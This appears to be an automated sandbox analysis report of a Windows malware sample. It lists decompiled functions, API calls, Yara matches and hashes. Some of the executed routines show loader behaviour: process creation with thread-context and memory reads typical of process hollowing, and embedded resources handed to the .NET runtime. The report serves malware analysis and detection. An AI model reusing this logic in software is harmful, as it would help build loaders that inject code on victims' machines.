                				signed int _t72;
                				short* _t73;
                
                				_t34 =  *0x412014; // 0x3bac56c0
                				_v8 = _t34 ^ _t72;
                				_push(_t53);
                				E00403F2B(_t53,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t52 =  *(_v24 + 8);
                					_t57 = _t52;
                					_a24 = _t52;
                				}
                				_t67 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					E004018CC();
                					return _t67;
                				}
                				_t55 = _t40 + _t40;
                				_t17 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				if((_t17 & _t40) == 0) {
                					_t71 = 0;
                					L11:
                					if(_t71 != 0) {
                						E00402460(_t67, _t71, _t67, _t55);
                						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                						if(_t45 != 0) {
                							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                						}
                					}
                					L14:
                					E004063D5(_t71);
                					goto L15;
                				}
                				_t20 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				_t47 = _t40 & _t20;
                				_t21 = _t55 + 8; // 0x8
                				_t63 = _t21;
                				if((_t40 & _t20) > 0x400) {
                					asm("sbb eax, eax");
                					_t71 = E00403E3D(_t63, _t47 & _t63);
                					if(_t71 == 0) {
                						goto L14;
                					}
                					 *_t71 = 0xdddd;
                					L9:
                					_t71 =  &(_t71[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E004018E0();
                				_t71 = _t73;
                				if(_t71 == 0) {
                					goto L14;
                				}
                				 *_t71 = 0xcccc;
                				goto L9;
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
                				signed int _t9;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0x412fc8 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0x40cd48 + _t9 * 4);
                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0x3bac56c1
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_t36 = GetLastError();
                				_t2 =  *0x412064; // 0xffffffff
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E00403ECE(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00404192(_t25, _t31, 0x4132a4);
                							E00403E03(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E00403E03();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E00403E8B(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0x412064; // 0xffffffff
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E00403ECE(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E00404192(_t27, _t32, 0x4132a4);
                									E00403E03(_t21);
                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E00403E03();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E00405878(_t25, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E00405878(_t23, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004025BA() {
                				void* _t4;
                				void* _t8;
                
                				E00402AE5();
                				E00402A79();
                				if(E004027D9() != 0) {
                					_t4 = E0040278B(_t8, __eflags);
                					__eflags = _t4;
                					if(_t4 != 0) {
                						return 1;
                					} else {
                						E00402815();
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 0000000E.00000001.300556989.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02850807
                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 028509D4
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: CreateFileFreeVirtual
                • String ID:
                • API String ID: 204039940-0
                • Opcode ID: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction ID: c65c753a7ede10e97c8e6629572fd8d3e13393109f9fb42b53826280a418d4c5
                • Opcode Fuzzy Hash: a31ddf8ab6fa1553e31ef8f8ebf533154cdda46e8ec2b8a06eaa7384c21ee20d
                • Instruction Fuzzy Hash: 43A1EE78E00219EFEF10CBE4C985BADBBB1BF0831AF20445AE914FA2A4D7755A40DF51
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 0285101F: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02851044
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02852050
                Strings
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: CreateFileSleep
                • String ID: 40fbb79f6fda487d8f06db1c793101bd
                • API String ID: 2694422964-1192784401
                • Opcode ID: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction ID: cefebbd4721606d506f1566900cdb46f87ac2faa80591370454e51b5b42a4ccf
                • Opcode Fuzzy Hash: bbe41873a6fbe4824ddb1bc01cae172123ace91d6be65c8ab8d238b5546e4da5
                • Instruction Fuzzy Hash: 14A2B719A94398A8EB70C7A4BC16BFD6371AF44B10F1054C7EA0CEE1E1D7B51ED49B0A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 02850373
                • GetThreadContext.KERNELBASE(?,00010007), ref: 02850396
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 028503BA
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: Process$ContextCreateMemoryReadThread
                • String ID:
                • API String ID: 2411489757-0
                • Opcode ID: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction ID: 238089be7aa42479bc7d718b2395bc3cd887f115752feb2d1c76d20c76b120b8
                • Opcode Fuzzy Hash: 37fd24b7046834f30630d687929405461260d361fc1990b34cc06047163f4ab3
                • Instruction Fuzzy Hash: 73322839D40228EEEB60CBA4DC45FEDB7B5BF48705F20449AE908FA2A0D7745A80CF15
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02851044
                Memory Dump Source
                • Source File: 0000000F.00000002.324036287.0000000002850000.00000040.00000001.sdmp, Offset: 02850000, based on PE: false
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction ID: 2fb9e06386086c284120f116ed393f0480e7b20a885c0e26c1611a96fcce98fa
                • Opcode Fuzzy Hash: 9f8e9afcff0953be4abdc7022b41d52809bd19f33aa56f18cc0135c0cf60f568
                • Instruction Fuzzy Hash: 3BD05EB9C5030CBFCB00EFE1C846C9DBF7DEB10742F10819AAC00A7204EA759B109A51
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Executed Functions

                C-Code - Quality: 100%
                			E00401E1D() {
                				_Unknown_base(*)()* _t1;
                
                				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
                				return _t1;
                			}

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                Memory Dump Source
                • Source File: 00000011.00000001.305861506.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                • Instruction Fuzzy Hash:
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401489() {
                				void* _v8;
                				struct HRSRC__* _t4;
                				long _t10;
                				struct HRSRC__* _t12;
                				void* _t16;
                
                				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
                				_t12 = _t4;
                				if(_t12 == 0) {
                					L6:
                					ExitProcess(0);
                				}
                				_t16 = LoadResource(GetModuleHandleW(0), _t12);
                				if(_t16 != 0) {
                					_v8 = LockResource(_t16);
                					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
                					_t13 = _v8;
                					if(_v8 != 0 && _t10 != 0) {
                						L00401000(_t13, _t10); // executed
                					}
                				}
                				FreeResource(_t16);
                				goto L6;
                			}

                APIs
                • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                  • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                • ExitProcess.KERNEL32 ref: 004014EE
                Strings
                Memory Dump Source
                • Source File: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                • String ID: v4.0.30319
                • API String ID: 2372384083-3152434051
                • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0254B730
                • GetCurrentThread.KERNEL32 ref: 0254B76D
                • GetCurrentProcess.KERNEL32 ref: 0254B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0254B803
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: 3a837df32316cd02d43adf7452dccd1b15e1dff7674a57e4e971c09ab5a01b20
                • Instruction ID: 5eae03a521b3f765cd0bb874cbbf92f70269e404121d1e239d9c5055dcd9dce7
                • Opcode Fuzzy Hash: 3a837df32316cd02d43adf7452dccd1b15e1dff7674a57e4e971c09ab5a01b20
                • Instruction Fuzzy Hash: EA5137B4D047888FDB10CFA9D588BEEBBF0BB49308F208459E419A7350DB34A945CB65
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetCurrentProcess.KERNEL32 ref: 0254B730
                • GetCurrentThread.KERNEL32 ref: 0254B76D
                • GetCurrentProcess.KERNEL32 ref: 0254B7AA
                • GetCurrentThreadId.KERNEL32 ref: 0254B803
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: Current$ProcessThread
                • String ID:
                • API String ID: 2063062207-0
                • Opcode ID: a6f6c7542b5da34d75e7662d224b08ccbe9e5ab049b9b2a38a73f8251a809754
                • Instruction ID: fef8e6090d93fa5e1a72608874bccf6776fe982e93dcc84ed8273035f21e5bc4
                • Opcode Fuzzy Hash: a6f6c7542b5da34d75e7662d224b08ccbe9e5ab049b9b2a38a73f8251a809754
                • Instruction Fuzzy Hash: BD5134B0D007888FDB10CFA9D588BAEBBF4FB48318F208559E419A7360DB74A945CF65
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 255e05f73fd459f1f76fa9a4a9ad1af25d1b566fd610dd8d5369fce4ca815d78
                • Instruction ID: 14f875a6d8eda6587ee8c5cde619160f130d9373d51d92002b6732400edfc33f
                • Opcode Fuzzy Hash: 255e05f73fd459f1f76fa9a4a9ad1af25d1b566fd610dd8d5369fce4ca815d78
                • Instruction Fuzzy Hash: 6522D478E04205DFEB14CB94D598AFEB772FF89300F26C555D422AB364C7B4A885CB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 0254962E
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: a89f98ba0e03ebbc9a9400aebdd5cafd777d90bc9eafc404c66dca264ba3249d
                • Instruction ID: e7cfd44fa2a3b292994cd38dac6d06d9239670a4a4afb86266cec56f525115c9
                • Opcode Fuzzy Hash: a89f98ba0e03ebbc9a9400aebdd5cafd777d90bc9eafc404c66dca264ba3249d
                • Instruction Fuzzy Hash: 0B712670A00B058FD764DF69D455B9BFBF1BF88208F00892AD59AD7A40DB35E806CF95
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0254FD0A
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: c0d7759b2d7dbbce6b50639df6cb5fee1916a623fcbdbc266af988204aef73a6
                • Instruction ID: c0cbc97507e9961ea83c83b11bfce89e7cdbdab1c8d7540af4dc1c7c10575c08
                • Opcode Fuzzy Hash: c0d7759b2d7dbbce6b50639df6cb5fee1916a623fcbdbc266af988204aef73a6
                • Instruction Fuzzy Hash: 5651CFB1D003499FDF14CFA9C884ADEFBB5BF48304F25852AE819AB210D7749946CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0254FD0A
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 749b7460bed15e619e3e214e7496a0c6de3948fb70ff888a38f756e6f4f9c6c2
                • Instruction ID: 31cf79655278b28e8d5e0698eb8451c9d874a2070949adb1edf9d2bd1a2d0893
                • Opcode Fuzzy Hash: 749b7460bed15e619e3e214e7496a0c6de3948fb70ff888a38f756e6f4f9c6c2
                • Instruction Fuzzy Hash: 89419EB1D003499FDF14CFA9C884ADEFBB5BF48314F24852AE819AB250DB749985CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: f527e3dbce57a453fa06232cb6533a18f268d9cee7d4bfef22809d50f9ce432b
                • Instruction ID: 40d8f44092067755618bcf40d1ef30115ef1159cafa91eb06e45b4f67d601390
                • Opcode Fuzzy Hash: f527e3dbce57a453fa06232cb6533a18f268d9cee7d4bfef22809d50f9ce432b
                • Instruction Fuzzy Hash: 004103B1C04658CFDF25CFA9C884BDDBBB2BF49304F20845AD508AB255D7B4594ACFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateActCtxA.KERNEL32(?), ref: 051B46B1
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 6f465f675e76d5d7139a9116c15447accafc9a554a56a8780ab9da50749a0fc5
                • Instruction ID: d462414f9d390f54967e953fd0ff49e406ccd482e9e3b4bfc9002e7949eeb29a
                • Opcode Fuzzy Hash: 6f465f675e76d5d7139a9116c15447accafc9a554a56a8780ab9da50749a0fc5
                • Instruction Fuzzy Hash: 9941F1B1C0465CCBDF24DFA9C884BDEBBB6BF49308F208469D509AB251D7B46946CF90
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 051B2531
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: fa8f476f05ccb93692d287cf1372af107c02aa5d3c541107869a614ae41cfc36
                • Instruction ID: 1d9a03df811284e19d832543bc1cb88c0f6f646b959f65d12cd5db0c047bbea0
                • Opcode Fuzzy Hash: fa8f476f05ccb93692d287cf1372af107c02aa5d3c541107869a614ae41cfc36
                • Instruction Fuzzy Hash: 0B4118B8A007458FDB14CF99C488BEABBF6FB88314F14C459D529AB321D774A945CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051BB957
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: CreateFromIconResource
                • String ID:
                • API String ID: 3668623891-0
                • Opcode ID: 9d78155367c30a313fc623deabcc2c6ca3baa79870a1cd0041e7bd4c478d777f
                • Instruction ID: f01d9945dd00a335c99b632280c7eb9a835b5055e5e7fe138ed820d631fc9a14
                • Opcode Fuzzy Hash: 9d78155367c30a313fc623deabcc2c6ca3baa79870a1cd0041e7bd4c478d777f
                • Instruction Fuzzy Hash: 4C31AD72908389AFDB11CFA9D840ADEBFF8EF09210F14845AF554A7221C334D954DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000011.00000002.326769052.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                Similarity
                • API ID: DispatchMessage
                • String ID:
                • API String ID: 2061451462-0
                • Opcode ID: af15e1e1cfbed19f9a2c0b1e799d0f6c41043c960e407a2599d5dc54786f6868
                • Instruction ID: c8da55c1731ded9a56c4c101540a9a2ed790518e843c52196efd89aac142a4b0
                • Opcode Fuzzy Hash: af15e1e1cfbed19f9a2c0b1e799d0f6c41043c960e407a2599d5dc54786f6868
                • Instruction Fuzzy Hash: F9318CB4A08258CFDF18CFA9D848AEDBBF1BF49314F058099E415AB361C7749844CF64
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254BD87
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 62727da111e6d433b6d70add54180477f90b8574762d65d0814fac3de963ee78
                • Instruction ID: 66a6afc7096f9ce6a89fdfa9decb0ed627f3cfc3b8ce4c0bb14edcbc370a79e5
                • Opcode Fuzzy Hash: 62727da111e6d433b6d70add54180477f90b8574762d65d0814fac3de963ee78
                • Instruction Fuzzy Hash: 8F21E2B5D002499FDB10CFA9D584AEEFBF4FB48314F14845AE969A7310C378A946CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0254BD87
                Memory Dump Source
                • Source File: 00000011.00000002.323763936.0000000002540000.00000040.00000001.sdmp, Offset: 02540000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: 0ff11eaaf0cf553d1f3591bd9ace84b491d5d4f45f16e484ef0fd0d4c80d8a22
                • Instruction ID: 14508d73f57370a75e9f32209082a351ee91575d2cc18469250e6ef8dd22c804
                • Opcode Fuzzy Hash: 0ff11eaaf0cf553d1f3591bd9ace84b491d5d4f45f16e484ef0fd0d4c80d8a22
                • Instruction Fuzzy Hash: 7721E4B5D002489FDB10CFA9D884ADEFBF8FB48314F14845AE919A3310C378A945CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051BBCBD
                Memory Dump Source
                • Source File: 00000011.00000002.326470893.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                Similarity
                • API ID: MessageSend
                • String ID:
                • API String ID: 3850602802-0
                • Opcode ID: 5a8095b05fe62f4d50ac3fafac7f618db3c4c18008518dfb7c34c25d5b5e9b01
                • Instruction ID: ccb974e08ddb2a94844f56df8eb1706a0c0defe5d147ddaeeb1513359b174c67
                • Opcode Fuzzy Hash: 5a8095b05fe62f4d50ac3fafac7f618db3c4c18008518dfb7c34c25d5b5e9b01
                • Instruction Fuzzy Hash: 922153B6804249DFDB10CF99C884BEEBBF8EB48310F10881AE459A7300C378A6418FA1
